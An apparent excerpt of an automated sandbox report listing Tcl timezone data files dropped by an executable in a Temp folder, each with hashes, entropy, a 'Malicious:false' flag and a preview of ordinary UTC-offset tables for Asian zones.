                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.786408960928606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8yIi7VyVAIgN1AIilHt2WFKSiZ1/2WFKXIi7v:SlSWB9IZaM3y7gVyVAIg5M2wKSg1/2wm
                                                                                                                                                                                                                                                    MD5:A30FEA461B22B2CB3A67A616E3AE08FD
                                                                                                                                                                                                                                                    SHA1:F368B215E15F6F518AEBC92289EE703DCAE849A1
                                                                                                                                                                                                                                                    SHA-256:1E2A1569FE432CDA75C64FA55E24CA6F938C1C72C15FBB280D5B04F6C5E9AD69
                                                                                                                                                                                                                                                    SHA-512:4F3D0681791C23EF19AFF239D2932D2CE1C991406F6DC8E313C083B5E03D806D26337ED2477700596D9A9F4FB1B7FC4A551F897A2A88CB7253CC7F863E586F03
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Kathmandu)]} {. LoadTimeZoneFile Asia/Kathmandu.}.set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Khandyga

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2156
                                                                                                                                                                                                                                                    Entropy (8bit):3.994799640059983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5NosZaPG2RxLk3IsfrWEL4mGubhEZIIAs5c:NZa9LLk3IsDWEL4nubqZI7s5c
                                                                                                                                                                                                                                                    MD5:B7AE4C2A3F0ECE90C0D403A0AB081164
                                                                                                                                                                                                                                                    SHA1:0D7EE6B9815D2F345F0F365DC1A995DBE318893F
                                                                                                                                                                                                                                                    SHA-256:81CB55EC1027D305FE1512F93489C17ABA7FD79C4B4E2ADE624DFF7015AA0EC3
                                                                                                                                                                                                                                                    SHA-512:8FCF26D3D6F2E2D4EEBBA9B8897A1B58CB5425F979E5CC357CBFACE567FD0AEB21CD7A0107E3A8C36D2B517BD7EBC023A13E24D121C5EA6ECEF747C599B275BA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Khandyga) {. {-9223372036854775808 32533 0 LMT}. {-1579424533 28800 0 YAKT}. {-1247558400 32400 0 YAKMMTT}. {354898800 36000 1 YAKST}. {370706400 32400 0 YAKT}. {386434800 36000 1 YAKST}. {402242400 32400 0 YAKT}. {417970800 36000 1 YAKST}. {433778400 32400 0 YAKT}. {449593200 36000 1 YAKST}. {465325200 32400 0 YAKT}. {481050000 36000 1 YAKST}. {496774800 32400 0 YAKT}. {512499600 36000 1 YAKST}. {528224400 32400 0 YAKT}. {543949200 36000 1 YAKST}. {559674000 32400 0 YAKT}. {575398800 36000 1 YAKST}. {591123600 32400 0 YAKT}. {606848400 36000 1 YAKST}. {622573200 32400 0 YAKT}. {638298000 36000 1 YAKST}. {654627600 32400 0 YAKT}. {670352400 28800 0 YAKMMTT}. {670356000 32400 1 YAKST}. {686080800 28800 0 YAKT}. {695757600 32400 0 YAKMMTT}. {701791200 36000 1 YAKST}. {717512400 32400 0 YAKT}. {733251600 36000 1 YAKST}. {748976400 32400

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kolkata

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):261
                                                                                                                                                                                                                                                    Entropy (8bit):4.664826781670047
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKvCm2OHEX3gYPZLvH7MsckVVFJGTL/FG/mYd4VFJL:MBp523CmdHNYPZTbXvJGnQmYd4vJL
                                                                                                                                                                                                                                                    MD5:50F6DB5384D951D8E6D0823FC01F0955
                                                                                                                                                                                                                                                    SHA1:DFC73B73C8C8DFB2D7C14DA8DEA869BF8AF3986B
                                                                                                                                                                                                                                                    SHA-256:FA74FCB73E4E7E510A152D5531779E94DB531D791F09D1A55EE177A4A0BF3320
                                                                                                                                                                                                                                                    SHA-512:F731CA322D84A55EDA9A1CDDA92DFB75FA3D7CE0041EE61F26CDA360F0A3B3B24E752BE7E918C80559F8A0F2B775327CBEDB6702818DCC8814FC0224E6239DD9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kolkata) {. {-9223372036854775808 21208 0 LMT}. {-2840162008 21200 0 HMT}. {-891582800 23400 0 BURT}. {-872058600 19800 0 IST}. {-862637400 23400 1 IST}. {-764145000 19800 0 IST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Krasnoyarsk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2096
                                                                                                                                                                                                                                                    Entropy (8bit):3.949583806985103
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQOCeWCXpYVOXgOE2jjyEkFR5Aynx7Xi/X+TipKS5llw+SNXCB3XkE5VXYpobxei:5ZfKydR/7Sf+uDyPQ3m302jT2o6
                                                                                                                                                                                                                                                    MD5:48BFF1C0F13E7A77B02BFE7E73C9A4A7
                                                                                                                                                                                                                                                    SHA1:5FE600B8A7831CFF022F12D1458A884051695CDA
                                                                                                                                                                                                                                                    SHA-256:CF64D435587772B62AD8466514F3675534239D96B1F74E0494FB586AEBE4A532
                                                                                                                                                                                                                                                    SHA-512:890A425B07A9C8D577EF45D7C876A113FA0045341B9CB6E5119F910EB4778453999F24701635AD4E23A5C6F6E3844870368D9985E54AA154514194A24F57F443
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Krasnoyarsk) {. {-9223372036854775808 22286 0 LMT}. {-1577513486 21600 0 KRAT}. {-1247551200 25200 0 KRAMMTT}. {354906000 28800 1 KRAST}. {370713600 25200 0 KRAT}. {386442000 28800 1 KRAST}. {402249600 25200 0 KRAT}. {417978000 28800 1 KRAST}. {433785600 25200 0 KRAT}. {449600400 28800 1 KRAST}. {465332400 25200 0 KRAT}. {481057200 28800 1 KRAST}. {496782000 25200 0 KRAT}. {512506800 28800 1 KRAST}. {528231600 25200 0 KRAT}. {543956400 28800 1 KRAST}. {559681200 25200 0 KRAT}. {575406000 28800 1 KRAST}. {591130800 25200 0 KRAT}. {606855600 28800 1 KRAST}. {622580400 25200 0 KRAT}. {638305200 28800 1 KRAST}. {654634800 25200 0 KRAT}. {670359600 21600 0 KRAMMTT}. {670363200 25200 1 KRAST}. {686088000 21600 0 KRAT}. {695764800 25200 0 KRAMMTT}. {701798400 28800 1 KRAST}. {717519600 25200 0 KRAT}. {733258800 28800 1 KRAST}. {748983600 25

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kuala_Lumpur

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):360
                                                                                                                                                                                                                                                    Entropy (8bit):4.564891512259757
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wK1NLm2OHrPmdXiWOb/qgOMesF3His0dqgs8kvmQCIqgN3Ln:MBp52PLmdHrPdDTNF+8tLn
                                                                                                                                                                                                                                                    MD5:2A5F7A3B1E59AF73A5E26771A7640E32
                                                                                                                                                                                                                                                    SHA1:386D0762AF8C53811288115B94F284B1A982FEEE
                                                                                                                                                                                                                                                    SHA-256:53136CFAEA9593D2A8A885947C985026DB08F863CCA36FEF510E8C0EFFC3CEF7
                                                                                                                                                                                                                                                    SHA-512:469D5C1278C5D4D2BE6D2DB4F7F9868C13FA33A22E13DBC103DDE53408A1E15B8D0FF6DBFC2E23F55786A57120DE43B911D6DACFAE903FD99F1710650F69B382
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuala_Lumpur) {. {-9223372036854775808 24406 0 LMT}. {-2177477206 24925 0 SMT}. {-2038200925 25200 0 MALT}. {-1167634800 26400 1 MALST}. {-1073028000 26400 0 MALT}. {-894180000 27000 0 MALT}. {-879665400 32400 0 JST}. {-767005200 27000 0 MALT}. {378664200 28800 0 MYT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kuching

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):703
                                                                                                                                                                                                                                                    Entropy (8bit):4.287678862773185
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKPLKm2OHXXUTdbNMCmGrMF2Mb9KQzztrDcerbhwBuvbnhMrFeiFd3v:MBp52HLKmdHXXUBOvV9rjhWX7zJZn
                                                                                                                                                                                                                                                    MD5:6F86A0A46810B2AD67806D70EEBBC508
                                                                                                                                                                                                                                                    SHA1:D7B07CD9A4B7C60E2DF2E40128B813BAEB34D40D
                                                                                                                                                                                                                                                    SHA-256:623100A7ECB624F697FFAE978878A080D3A24638D945D179A938AAB04A532DBD
                                                                                                                                                                                                                                                    SHA-512:42C57844B398A58A1AA11DBDE29427BD49F61FC5F3B9E66F7850C94574C8AE692FCAE140AA5E531E65461B95E56B6738DB51495D71E675A84C8F6B93A3D01096
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuching) {. {-9223372036854775808 26480 0 LMT}. {-1383463280 27000 0 BORT}. {-1167636600 28800 0 BORT}. {-1082448000 30000 1 BORTST}. {-1074586800 28800 0 BORT}. {-1050825600 30000 1 BORTST}. {-1042964400 28800 0 BORT}. {-1019289600 30000 1 BORTST}. {-1011428400 28800 0 BORT}. {-987753600 30000 1 BORTST}. {-979892400 28800 0 BORT}. {-956217600 30000 1 BORTST}. {-948356400 28800 0 BORT}. {-924595200 30000 1 BORTST}. {-916734000 28800 0 BORT}. {-893059200 30000 1 BORTST}. {-885198000 28800 0 BORT}. {-879667200 32400 0 JST}. {-767005200 28800 0 BORT}. {378662400 28800 0 MYT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Kuwait

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):168
                                                                                                                                                                                                                                                    Entropy (8bit):4.82804794783422
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8t1zVAIgNsM1E2WFKdQWFK81S:SlSWB9IZaM3yN1zVAIgaM1E2wKdQwK8c
                                                                                                                                                                                                                                                    MD5:6D6109F6EC1E12881C60EC44AAEB772B
                                                                                                                                                                                                                                                    SHA1:B5531BEAC1C07DA57A901D0A48F4E1AC03F07467
                                                                                                                                                                                                                                                    SHA-256:67BB9F159C752C744AC6AB26BBC0688CF4FA94C58C23B2B49B871CAA8774FC5D
                                                                                                                                                                                                                                                    SHA-512:B0624B9F936E5C1392B7EBB3190D7E97EAE96647AB965BB9BE045D2C3082B1C7E48FF89A7B57FD3475D018574E7294D45B068C555A43AAEDFD65AC5C5C5D0A5B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Riyadh)]} {. LoadTimeZoneFile Asia/Riyadh.}.set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Macao

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):164
                                                                                                                                                                                                                                                    Entropy (8bit):4.729350272507574
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8PpVAIgNz5YF2WFKf+WFKjn:SlSWB9IZaM3yxVAIgLYF2wKGwKjn
                                                                                                                                                                                                                                                    MD5:DB6155900D4556EE7B3089860AD5C4E3
                                                                                                                                                                                                                                                    SHA1:708E4AE427C8BAF589509F4330C389EE55C1D514
                                                                                                                                                                                                                                                    SHA-256:8264648CF1EA3E352E13482DE2ACE70B97FD37FBB1F28F70011561CFCBF533EA
                                                                                                                                                                                                                                                    SHA-512:941D52208FABB634BABCD602CD468F2235199813F4C1C5AB82A453E8C4CE4543C1CE3CBDB9D035DB039CFFDBC94D5D0F9D29363442E2458426BDD52ECDF7C3C5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Macau)]} {. LoadTimeZoneFile Asia/Macau.}.set TZData(:Asia/Macao) $TZData(:Asia/Macau).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Macau

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1286
                                                                                                                                                                                                                                                    Entropy (8bit):3.979357479876244
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ2eCXRr4zG7JG/UDzUUas7yAckSTcvZIItNnl2TtCjjz21z2:5oRr4y7o8DSlT+ln91
                                                                                                                                                                                                                                                    MD5:D5EAFB8BDD7331EE6152B1FA3C179492
                                                                                                                                                                                                                                                    SHA1:25AB37395DA05A828CFE545931C9EE0BBC47E4CD
                                                                                                                                                                                                                                                    SHA-256:432CC7EA35F46F1BC95F1863FBC540BD1B541BBFD1CE3FFC2DA404C1104E8596
                                                                                                                                                                                                                                                    SHA-512:F26B1FE6EB3561DBC01671452C72912C18AEE8AD34F49BD2F27E44C253F1A17EA1AE1B7E39EE0908272BF92F974CB84995885EBD271797AA492A33D3B42AABBE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Macau) {. {-9223372036854775808 27260 0 LMT}. {-1830411260 28800 0 MOT}. {-277360200 32400 1 MOST}. {-257405400 28800 0 MOT}. {-245910600 32400 1 MOST}. {-225955800 28800 0 MOT}. {-214473600 32400 1 MOST}. {-194506200 28800 0 MOT}. {-182406600 32400 1 MOST}. {-163056600 28800 0 MOT}. {-150969600 32400 1 MOST}. {-131619600 28800 0 MOT}. {-117088200 32400 1 MOST}. {-101367000 28800 0 MOT}. {-85638600 32400 1 MOST}. {-69312600 28800 0 MOT}. {-53584200 32400 1 MOST}. {-37863000 28800 0 MOT}. {-22134600 32400 1 MOST}. {-6413400 28800 0 MOT}. {9315000 32400 1 MOST}. {25036200 28800 0 MOT}. {40764600 32400 1 MOST}. {56485800 28800 0 MOT}. {72201600 32400 1 MOST}. {87922800 28800 0 MOT}. {103651200 32400 1 MOST}. {119977200 28800 0 MOT}. {135705600 32400 1 MOST}. {151439400 28800 0 MOT}. {167167800 32400 1 MOST}. {182889000 28800 0 MOT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Magadan

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2092
                                                                                                                                                                                                                                                    Entropy (8bit):3.9611945608474217
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQmech8vhOCTi7ZXltAtwGpd296ymXPO9UHxQdCHt/CXHmW9YbcINuC:5ZvhBiR8ld296yKPO9UHj1UGWgc4uC
                                                                                                                                                                                                                                                    MD5:E9010A0624F17201EDAE5BB52D16AF30
                                                                                                                                                                                                                                                    SHA1:9640299D919D53BA79D4A5BF3210A1AE3B22D0E8
                                                                                                                                                                                                                                                    SHA-256:BB2FE59341E7BAD597632202026DE2ECA73C78E5C08F659E78B6A9CC8CF1F1AF
                                                                                                                                                                                                                                                    SHA-512:347BE45C9309DE99130E1849B1BD1F58295196394600122730F2BC7D76A5FD40BBA758256B39B32CB983C2378AB028FF33F7FF06253753C50D2193F229A65748
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Magadan) {. {-9223372036854775808 36192 0 LMT}. {-1441188192 36000 0 MAGT}. {-1247565600 39600 0 MAGMMTT}. {354891600 43200 1 MAGST}. {370699200 39600 0 MAGT}. {386427600 43200 1 MAGST}. {402235200 39600 0 MAGT}. {417963600 43200 1 MAGST}. {433771200 39600 0 MAGT}. {449586000 43200 1 MAGST}. {465318000 39600 0 MAGT}. {481042800 43200 1 MAGST}. {496767600 39600 0 MAGT}. {512492400 43200 1 MAGST}. {528217200 39600 0 MAGT}. {543942000 43200 1 MAGST}. {559666800 39600 0 MAGT}. {575391600 43200 1 MAGST}. {591116400 39600 0 MAGT}. {606841200 43200 1 MAGST}. {622566000 39600 0 MAGT}. {638290800 43200 1 MAGST}. {654620400 39600 0 MAGT}. {670345200 36000 0 MAGMMTT}. {670348800 39600 1 MAGST}. {686073600 36000 0 MAGT}. {695750400 39600 0 MAGMMTT}. {701784000 43200 1 MAGST}. {717505200 39600 0 MAGT}. {733244400 43200 1 MAGST}. {748969200 39600

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Makassar

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):235
                                                                                                                                                                                                                                                    Entropy (8bit):4.733228681678453
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKCm2OHUVRYQTLQTvUfkc3g/xlHkH8vm+Wv:MBp526mdHsrTD8cQZd7kv
                                                                                                                                                                                                                                                    MD5:82906ADF0FCACBEED34B7F801DDC3024
                                                                                                                                                                                                                                                    SHA1:7E57471D9622F870AE4B8DCC5FEE555A7DCBBDFD
                                                                                                                                                                                                                                                    SHA-256:40B2C3BDA0FA2D0ABE2848C5F435FAE5D80356B439701DAEBDD5F28A1C822B29
                                                                                                                                                                                                                                                    SHA-512:FE9FA3D531A4CE1EBDF6B77E123BA47D8F37A07C59F2107C7AF794AF9959247F74F107556808640190C5AE44F2DBF6CFACCFC6C9AEBB2330953BE78E45A78349
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Makassar) {. {-9223372036854775808 28656 0 LMT}. {-1577951856 28656 0 MMT}. {-1172908656 28800 0 WITA}. {-880272000 32400 0 JST}. {-766054800 28800 0 WITA}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Manila

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):409
                                                                                                                                                                                                                                                    Entropy (8bit):4.441574068554676
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKefwJm2OHVkezucVAePHZb8vfRvWdAcQzvmy2mRKEjvfgAf5kvfQQC:MBp52G4JmdHnzZBPyHncQzXXjHiH6
                                                                                                                                                                                                                                                    MD5:CCDABEEDF0EC4CC598557F5F7C18568A
                                                                                                                                                                                                                                                    SHA1:D4C3EB158887A7B564DD7462FD8BDD52E95B6B98
                                                                                                                                                                                                                                                    SHA-256:19BA48A251DBCF8435B4D8797AE9EE94CF24D9247A1ADD987B3A6075EB0FE4D3
                                                                                                                                                                                                                                                    SHA-512:A24F2264F258CF502C64FE4EC4ED393D0B74325AB4203D14A97ECEF435D0811196FFA6884328E8B0BCE5348B70665E05549AEB280F880BC901CA6A82E59A938A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Manila) {. {-9223372036854775808 -57360 0 LMT}. {-3944621040 29040 0 LMT}. {-2229321840 28800 0 PHT}. {-1046678400 32400 1 PHST}. {-1038733200 28800 0 PHT}. {-873273600 32400 0 JST}. {-794221200 28800 0 PHT}. {-496224000 32400 1 PHST}. {-489315600 28800 0 PHT}. {259344000 32400 1 PHST}. {275151600 28800 0 PHT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Muscat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                                                                                    Entropy (8bit):4.754394427749078
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8DhVAIgN6Sn62WFKvE+H+WFKQo:SlSWB9IZaM3yjhVAIgMS62wKLewKQo
                                                                                                                                                                                                                                                    MD5:5D8EBBC297A2258C352BC80535B7F7F1
                                                                                                                                                                                                                                                    SHA1:684CAF480AF5B8A98D9AD1A1ECD4E07434F36875
                                                                                                                                                                                                                                                    SHA-256:4709F2DA036EB96FB7B6CC40859BF59F1146FE8D3A7AFE326FBA3B8CB68049CE
                                                                                                                                                                                                                                                    SHA-512:FD67E920D3D5FE69AF35535A8BBD2791204C6B63050EFECC0857F24D393712C4BC4660EA0A350D2A4DDA144073413BE013D71D73E6F3638CA30480541F9731FA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Dubai)]} {. LoadTimeZoneFile Asia/Dubai.}.set TZData(:Asia/Muscat) $TZData(:Asia/Dubai).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Nicosia

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7368
                                                                                                                                                                                                                                                    Entropy (8bit):3.620699686510499
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:EPByq7VKviW/naKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEA:EPFi//uh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:21EEEC6314C94D1476C2E79BBACFEB77
                                                                                                                                                                                                                                                    SHA1:2C9805CD01C84D446CBDB90B9542CB24CCDE4E39
                                                                                                                                                                                                                                                    SHA-256:7AAB1AC67D96287EE468608506868707B28FCD27A8F53128621801DCF0122162
                                                                                                                                                                                                                                                    SHA-512:D4B0A0E60B102E10E03CF5BD07C5783E908D5E7079B646177C57C30D67B44C114EFF4DCFC71AF8441D67BD5A351068FBFFD8C5E08F06F1D69946B3EA7D49FC2D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Nicosia) {. {-9223372036854775808 8008 0 LMT}. {-1518920008 7200 0 EET}. {166572000 10800 1 EEST}. {182293200 7200 0 EET}. {200959200 10800 1 EEST}. {213829200 7200 0 EET}. {228866400 10800 1 EEST}. {243982800 7200 0 EET}. {260316000 10800 1 EEST}. {276123600 7200 0 EET}. {291765600 10800 1 EEST}. {307486800 7200 0 EET}. {323820000 10800 1 EEST}. {338936400 7200 0 EET}. {354664800 10800 1 EEST}. {370386000 7200 0 EET}. {386114400 10800 1 EEST}. {401835600 7200 0 EET}. {417564000 10800 1 EEST}. {433285200 7200 0 EET}. {449013600 10800 1 EEST}. {465339600 7200 0 EET}. {481068000 10800 1 EEST}. {496789200 7200 0 EET}. {512517600 10800 1 EEST}. {528238800 7200 0 EET}. {543967200 10800 1 EEST}. {559688400 7200 0 EET}. {575416800 10800 1 EEST}. {591138000 7200 0 EET}. {606866400 10800 1 EEST}. {622587600 7200 0 EET}. {638316000 10800

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Novokuznetsk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2130
                                                                                                                                                                                                                                                    Entropy (8bit):3.9912071944834855
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ2fen8NXpYVOXgOE2jjyEkFR5Aynx7Xi/X+TipKS5llw+SNXCB3XkE5VXYpobxK:5bfKydR/7Sf+uDyPQ3m302jT2oj
                                                                                                                                                                                                                                                    MD5:A05E0DF442F5CF466EC97D808898B96D
                                                                                                                                                                                                                                                    SHA1:63A63068F7EA2FFA0A7F5A534D71F83FB42E4B5A
                                                                                                                                                                                                                                                    SHA-256:969DB2F0A92F62872D2ABE626CBC2E532690DFF8E577444B577D8D79C23F8962
                                                                                                                                                                                                                                                    SHA-512:7A91A9269400087C5CE1B51C429102B296D16540101C267340A1064CFEB2C6084959D9B84FF8C27285FAC7C19C66F4D1C1E3EAE5EC4949A079C135F30BC9B418
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
